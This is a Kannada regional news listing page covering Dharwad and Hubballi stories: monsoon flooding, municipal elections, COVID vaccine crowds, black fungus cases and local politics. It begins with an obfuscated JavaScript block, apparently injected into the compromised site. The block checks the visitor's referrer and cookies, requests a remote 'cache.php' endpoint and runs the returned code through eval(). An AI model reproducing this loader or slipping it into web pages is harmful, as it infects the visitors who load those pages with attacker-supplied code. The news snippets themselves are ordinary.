;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//hallivani.com/8jju21px/cache/cache.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

ಧಾರವಾಡ

ನಿರಂತರ ಮಳೆಗೆ ಧಾರವಾಡ ತತ್ತರ: ಹಳ್ಳದ ನೀರಿನಲ್ಲಿ ಕೊಚ್ಚಿ ಹೋದ ಜಾನುವಾರು

ಧಾರವಾಡ, ಜುಲೈ 23: ಜಿಲ್ಲೆಯಲ್ಲಿ ವರುಣನ ಅರ್ಭಟ ಜೋರಾಗಿದ್ದು, ಹಳ್ಳಗಳು ಉಕ್ಕಿ ಹರಿಯುತ್ತಿದೆ. ಇನ್ನು ನೀರಿನ ರಭಸಕ್ಕೆ ಜಾನುವಾರುಗಳು ಕೊಚ್ಚಿ…

ಹುಬ್ಬಳ್ಳಿ ಧಾರವಾಡ ಮಹಾನಗರ ಪಾಲಿಕೆಯ ಚುನಾವಣೆಗೆ ಮತ್ತೊಂದು ಗ್ರಹಣ

ಧಾರವಾಡ, ಜುಲೈ 2: ಹುಬ್ಬಳ್ಳಿ ಧಾರವಾಡ ಮಹಾನಗರ ಪಾಲಿಕೆಯ ಚುನಾವಣೆಗೆ ಮತ್ತೊಂದು ಗ್ರಹಣ ಎದುರಾಗಿದೆ.  ಅವಳಿ ನಗರಗಳಲ್ಲಿ ಹೊಸದಾಗಿ ರಚನೆಯಾದ…

ಆಮೆಗತಿಯಲ್ಲಿ ಅವಳಿ ನಗರದ ವಿವಿಧ ಕಾಮಗಾರಿಗಳು: ಸಾರ್ವಜನಿಕರ ಶಾಪ!

ಹುಬ್ಬಳ್ಳಿ, ಜುಲೈ 1: ಹುಬ್ಬಳ್ಳಿ-ಧಾರವಾಡದ ಅವಳಿ ನಗರದಲ್ಲಿ ಸ್ಮಾರ್ಟ್ ಸಿಟಿ ಯೋಜನೆಯಡಿ ಹಲವು ಕಾಮಗಾರಿಗಳು ಆರಂಭವಾಗಿ ಹಲವು ವರ್ಷಗಳಾಗಿವೆ.    ಹೀಗೆ…

ಕೆಐಎಡಿಬಿ ಸೈಟ್ ಹಂಚಿಕೆಯಲ್ಲಿ ಅನ್ಯಾಯ : ACBಯಿಂದ ದಾಖಲೆ ಪರಿಶೀಲನೆ

ಧಾರವಾಡ, ಜೂನ 30: ಕೆಐಎಡಿಬಿ ಸೈಟ್ ಹಂಚಿಕೆಯಲ್ಲಿ ಅನ್ಯಾಯ ಮಾಡಿರುವ ದೂರು ಕೇಳಿಬಂದ ಹಿನ್ನೆಲೆ ಕೆಐಎಡಿಬಿ ಕಚೇರಿಯಲ್ಲಿ ಎಸಿಬಿ‌ ಅಧಿಕಾರಿಗಳು…

ಕರ್ನಾಟಕ ವಿಶ್ವ ವಿದ್ಯಾಲಯದ ಮೌಲ್ಯಮಾಪನ ಕುಲಸಚಿವರಾಗಿ ಎಚ್ ನಾಗರಾಜ್ ಅಧಿಕಾರ ಸ್ವೀಕಾರ

ಧಾರವಾಡ, ಜೂನ 26: ಕರ್ನಾಟಕ ವಿಶ್ವ ವಿದ್ಯಾಲಯದ ಮೌಲ್ಯಮಾಪನ ಕುಲಸಚಿವರಾಗಿ ಮೈಸೂರು ವಿಶ್ವವಿದ್ಯಾಲಯದ ಹಿರಿಯ ಪ್ರಾಧ್ಯಾಪಕ ಎಚ್. ನಾಗರಾಜ್ ಅಧಿಕಾರ…

ವ್ಯಾಕ್ಸಿನ್​ಗಾಗಿ ಧಾರವಾಡ ಜಿಲ್ಲಾಸ್ಪತ್ರೆ ಯಲ್ಲಿ ನೂಕು-ನುಗ್ಗಲು

ಧಾರವಾಡ, ಜೂನ 26: ಜಿಲ್ಲಾಸ್ಪತ್ರೆ ಲಸಿಕಾ ಕೇಂದ್ರದಲ್ಲಿ ಕೋವಿಡ್​ ವ್ಯಾಕ್ಸಿನ್​ಗಾಗಿ ನೂಕು ನುಗ್ಗಲು ಉಂಟಾಗಿತ್ತು. ಶಾಂತವಾಗಿ  ನಿಂತಿದ್ದ ಸಾರ್ವಜನಿಕರು, ಕೂಪನ್…

ದೃಷ್ಟಿ ಹೀನರನ್ನಾಗಿಸಿದ ಬ್ಲ್ಯಾಕ್​ ಫಂಗಸ್​​

ಹುಬ್ಬಳ್ಳಿ, ಜೂನ 23: ಕೊರೊನಾ ಗುಣಮುಖ ವ್ಯಕ್ತಿಯಲ್ಲಿ ಕಾಣಿಸಿಕೊಂಡ ಬ್ಲ್ಯಾಕ್​ ಫಂಗಸ್​ನಿಂದ ಜಿಲ್ಲೆಯಲ್ಲಿ ಎಂಟು ಮಂದಿ ದೃಷ್ಟಿ ಹೀನರಾಗಿದ್ದಾರೆ. ಕೊರೋನಾದಿಂದ…

ಯಡಿಯೂರಪ್ಪ ಅವರನ್ನ ಮುಖ್ಯಮಂತ್ರಿ ಮಾಡಿದ್ದು ನಾನೇ: ಚಂದ್ರಕಾಂತ ಬೆಲ್ಲದ​

ಧಾರವಾಡ, ಜೂನ 17: ಬಿ‌.ಎಸ್‌.ಯಡಿಯೂರಪ್ಪ ಅವರನ್ನು ಮುಖ್ಯಮಂತ್ರಿ ಮಾಡಿದ್ದು ನಾನೇ. ಇದು ರಾಜ್ಯದ ಎಲ್ಲ ನಾಯಕರಿಗೂ ಗೊತ್ತಿದೆ ಎಂದು ಮಾಜಿ…

ಕಲಬುರಗಿ ಕೇಂದ್ರೀಯ ವಿವಿ ವಿಶ್ರಾಂತ ಕುಲಪತಿ ಪ್ರೊ. ಎಚ್.ಎಂ. ಮಹೇಶ್ವರಯ್ಯ ನಿಧನ

ಧಾರವಾಡ, ಜೂನ 13: ಇಲ್ಲಿನ ಕಲ್ಯಾಣ ನಗರ ನಿವಾಸಿಯಾಗಿದ್ದ ಕಲಬುರಗಿ ಕೇಂದ್ರೀಯ ವಿವಿ ವಿಶ್ರಾಂತ ಕುಲಪತಿ ಪ್ರೊ. ಎಚ್.ಎಂ. ಮಹೇಶ್ವರಯ್ಯ…

ಬೆಲ್ಲದ ದೆಹಲಿ ಭೇಟಿ: ವಿಶೇಷ ಅರ್ಥ ಕಲ್ಪಿಸುವುದು ಬೇಡ ಎಂದ ಶೆಟ್ಟರ್‌

ಹುಬ್ಬಳ್ಳಿ, ಜೂನ 12: ಶಾಸಕ ಅರವಿಂದ ಬೆಲ್ಲದ ನವದೆಹಲಿ ಭೇಟಿ ಕುರಿತು ಮಾಧ್ಯಮಕ್ಕೆ ಪ್ರತಿಕ್ರಿಯಿಸಿದ ಸಚಿವ ಜಗದೀಶ ಶೆಟ್ಟರ್‌ ರಾಜ್ಯದಲ್ಲಿ…

ಲಾಕ್​ಡೌನ್​ ಮಧ್ಯೆ ಪಾಲಿಕೆಯಿಂದ ಅತಿಕ್ರಮಣ ಅಂಗಡಿ ತೆರವು ಕಾರ್ಯಾಚರಣೆ

ಧಾರವಾಡ, ಜೂನ್ 5: ಧಾರವಾಡದ ಸೂಪರ್ ಮಾರುಕಟ್ಟೆಯಲ್ಲಿ ಅತಿಕ್ರಮಣ ಮಾಡಿಕೊಂಡಿರುವ ಅಂಗಡಿಗಳನ್ನು ‌ಬೆಳ್ಳಂ ಬೆಳಗ್ಗೆ ಪಾಲಿಕೆ ಅಧಿಕಾರಿಗಳು ತೆರವು ಕಾರ್ಯಾಚರಣೆ…

ಕೊರೊನಾ ಮಹಾಮಾರಿ ಮಧ್ಯೆ ಧಾರವಾಡದಲ್ಲಿ ಚಿಕೂನ್ ಗುನ್ಯಾ

ಧಾರವಾಡ, ಜೂನ್ 3: ಕೊರೊನಾ ಮಹಾಮಾರಿಯಿಂದ ಜನರು ತತ್ತರಿಸಿರುವಾಗಲೇ ಧಾರವಾಡದಲ್ಲೀಗ ಚಿಕೂನ್ ಗುನ್ಯಾದ ಆತಂಕ ಶುರುವಾಗಿದೆ. ಜಿಲ್ಲೆಯ ಲಕಮಾಪೂರ ಗ್ರಾಮದ…

ಕಿಮ್ಸ್​ನಲ್ಲಿ ಎಲ್​ಆಂಡ್​ಟಿಯ 1 ಟನ್ ಸಾಮರ್ಥ್ಯದ ಪ್ರಾಣವಾಯು ಘಟಕ : ಪ್ರಲ್ಹಾದ ಜೋಶಿ

ಹುಬ್ಬಳ್ಳಿ, ಮೇ 31: ಇಲ್ಲಿನ ಕಿಮ್ಸ್ ಆವರಣದಲ್ಲಿ ಎಲ್​ಆಂಡ್​ಟಿ ವತಿಯಿಂದ ನಿರ್ವಿುಸಲಾಗುತ್ತಿರುವ 1 ಟನ್ ಸಾಮರ್ಥ್ಯದ ಆಮ್ಲಜನಕ ಉತ್ಪಾದನೆ ಘಟಕಕ್ಕೆ…

ಅವ್ಯವಸ್ಥೆಯ ಆಗರವಾದ ಕಿಮ್ಸ್​​ನ ಕೋವಿಡ್​ ಐಸಿಯು ವಾರ್ಡ್

ಹುಬ್ಬಳ್ಳಿ, ಮೇ 30: ಕರೊನಾ‌ ವಿರುದ್ಧದ ಹೋರಾಟದಲ್ಲಿ ಮೊದಲ ಸ್ಥಾನದಲ್ಲಿರುವ ಕಿಮ್ಸ್​​ನ ಆಸ್ಪತ್ರೆಯಲ್ಲಿ ಕರೊನಾ ಐಸಿಯು ವಾರ್ಡ್​​ ಈಗ ಅವ್ಯವಸ್ಥೆಯ…

ಎಟಿಎಮ್​ಗೆ ಹೋಗಿದ್ದ ಯುವಕನ ಮೇಲೆ ಪೊಲೀಸ್​ ದರ್ಪ

ಲಾಕ್​ಡೌನ್​ ನಿಯಮ ಉಲ್ಲಂಘಿಸಿದ್ದಾನೆ ಎಂದು ಆರೋಪಿಸಿ ಯುವಕನಿಗೆ  ಪಿಎಸ್​ಐ ಹಿಗ್ಗಾಮುಗ್ಗಾ ಥಳಿಸಿರುವ ಘಟನೆ ಹುಬ್ಬಳ್ಳಿಯಲ್ಲಿ ನಡೆದಿದೆ. ಗಂಭೀರವಾಗಿ ಗಾಯಗೊಂಡಿರುವ ಯುವಕ…

ಹಳ್ಳಿಗಳಲ್ಲೇ ಕೊರೊನಾ ಕಾಳಜಿ ಕೇಂದ್ರ ತೆರೆದು ಸೋಂಕಿತರ ಆರೈಕೆಗೆ ಯೋಜನೆ: ಧಾರವಾಡ ಡಿಸಿ

ಹುಬ್ಬಳ್ಳಿ , ಮೇ 28: ಧಾರವಾಡ ಜಿಲ್ಲೆಯಲ್ಲಿ ಕೋವಿಡ್ ನಿಯಂತ್ರಣ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಹೋಬಳಿ, ಗ್ರಾಮ ಪಂಚಾಯತ್ ವ್ಯಾಪ್ತಿಯಲ್ಲಿ ಕೋವಿಡ್ ಕಾಳಜಿ…

ಮೇ.27, 28 ಹಾಗೂ 29 ಮೂರು ದಿನಗಳ ಕಾಲ ಕಿರಾಣಿ, ಮಾಂಸ ಮಾರಾಟ ಅವಧಿ ಬೆಳಿಗ್ಗೆ 6 ರಿಂದ ಮಧ್ಯಾಹ್ನ 12 ರವರೆಗೆ ವಿಸ್ತರಣೆ

ಧಾರವಾಡ, ಮೇ.25: ಕೊರೊನಾ ನಿಯಂತ್ರಿಸಲು ಕಠಿಣ ಲಾಕ್‌ಡೌನ್ ಜಾರಿಗೊಳಿಸಿರುವ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಜನತೆಗೆ ಕಿರಾಣಿ, ಮಾಂಸದ ಪದಾರ್ಥಗಳನ್ನು ಪೂರೈಸಲು ಮೇ.27 ಗುರುವಾರ,…